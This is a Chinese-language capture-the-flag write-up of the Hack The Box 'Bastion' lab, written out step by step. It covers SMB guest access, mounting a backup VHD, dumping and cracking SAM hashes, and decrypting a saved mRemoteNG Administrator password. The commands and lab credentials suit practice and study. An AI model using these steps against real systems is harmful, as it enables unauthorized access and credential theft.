Hack The Box — Bastion Write up

今天分享一個可以練習mount和SMB相關指令的題目Bastion

Hack The Box :: Penetration Testing Labs

尋找User之路

首先使用NMAP掃描

nmap -sV -T4 -O -F — version-light 10.10.10.134

-F 加快掃描

-sV需要各種服務

smbmap -L 10.10.10.134

smbclient //連線SMB伺服器的工具

指令格式：smbclient –L [SMB伺服器IP] [參數]

-p：指定連線port number

-U 使用者名稱：指定使用者名稱

-L List all drives on the specified host

帳號可使用 Guest

我們發現 使用Guest 密碼空白就可以access

Windows 這邊指令我很不熟 所以看了很多教學

參考如下:

使用cd時候最後要列出Backup 2019–02–22 12351內的檔案

最後指令資料夾路徑要加入” ” (括號)

我在這邊卡的時間蠻長的

smb: \WindowsImageBackup\L4mpje-PC\> cd “Backup 2019–02–22 124351”

發現是vhd , 於Linux下使用mount 將檔案下載下來(惡夢開始)

因為Mount 不常使用 所以不熟 也看了很多資料 如下:

https://medium.com/@klockw3rk/mounting-vhd-file-on-kali-linux-through-remote-share-f2f9542c1f25

指令:

mount -t cifs //10.10.10.134/Backups/WindowsImageBackup/L4mpje-PC ~/Desktop/mount -o user=anonymous

輸入完後會顯示:

Password for anonymous@//10.10.10.134/Backups/WindowsImageBackup/L4mpje-PC:

不過這時候我一直沒有處理得很好 ，所以先回到Windows上面。

讓10.10.10.134的路徑加到我的網路位置:

把SAM和SYSTE複製出來後掛載VHD解這兩個檔案，除了檔案很肥以外我還解不出答案來，後來回去找了Kali上方式..

Mounting the Backup Image, Dumping Credentials, User Flag
These vhd images are the system backup files. As the note said, trying to download them will take a very long time and probably won’t finish because of their big size, so instead we will mount them, I wanted to look at 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd first. This was helpful.

用Mount指令 不用整個把檔案載下來

(當時Windows下我解不出來檔案的數值， 後來我回想應該是我指令下錯 )
所以上面浪費了一點時間XD 回到Kali上

Kali

先mount上檔案:

root@kali:~# mount -t cifs //10.10.10.134/Backups/WindowsImageBackup/L4mpje-PC /mnt/L4mpje-PC/ -o user=anonymous

Password for anonymous@//10.10.10.134/Backups/WindowsImageBackup/L4mpje-PC:

root@kali:~# qemu-nbd -r -c /dev/nbd0 “/mnt/L4mpje-PC/Backup 2019–02–22 124351/9b9cfbc4–369e-11e9-a17c-806e6f6e6963.vhd”

root@kali:~# mount -r /dev/nbd0p1 /mnt/vhd

root@kali:~# cd /mnt/vhd

接下來要找到SAM和SYSTEM的檔案放置處

在System32/Config 下

samdump2 SYSTEM SAM

Windows格式是Ntlm 上網找網站去反解得到:

26112010952d963c8dc4217daec986d9

接下來連線回去主機登入

Kali內用ssh連線

L4mpje@10.10.10.134 
密碼是解出來的bureaulampje

在桌面 把檔案用type找出來

9bXXXXXXXXXXXXXXXXXXcd

我試著輸入root

沒有結果

回hack the box 輸入解答

得到分數

尋找Root:

C:\Users\L4mpje\AppData\Roaming

這邊可以知道Windows下有安裝甚麼東西

發現了一個可以遠端的程式 mRemoteNG

mRemoteNG is a fork of mRemote: an open source, tabbed, multi-protocol, remote connections manager. mRemoteNG adds bug fixes and new features to mRemote.
It allows you to view all of your remote connections in a simple yet powerful tabbed interface. -mremoteng.org

找到該資料夾下的confCons.xml

將檔案下載下來 最後一個.是當前目錄

scp l4mpje@10.10.10.134:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml .

我用nano打開confCons.xml

找到Admin 後面的password

aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

丟base 64 decode解不開

上網查一下 他有先處理過才base64

使用這套工具來解

https://github.com/kmahyyg/mremoteng-decrypt/blob/master/mremoteng_decrypt.py

python3 NG.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

密碼為 :

thXLHM96BeKL0ER2

接著SSH登入

Administrator@10.10.10.134
thXLHM96BeKL0ER2

解出來為

95XXXXXXXXXXXXXXXXXXXXXc8

拋回去解Own Root!拿到分數囉

若您喜歡我的文章，歡迎按下「拍手」與Liker按讚給我支持並轉發給你的朋友們(可以多拍幾下手喔)，或是「Follow」我，讓我提供更多優質文章給您。

另外可以加入我的LinkedIn 希望認識各位閱讀者

加入後歡迎跟我打招呼認識一下 我每年都會參加社群

例如HITCON或COSCUP 樂意認親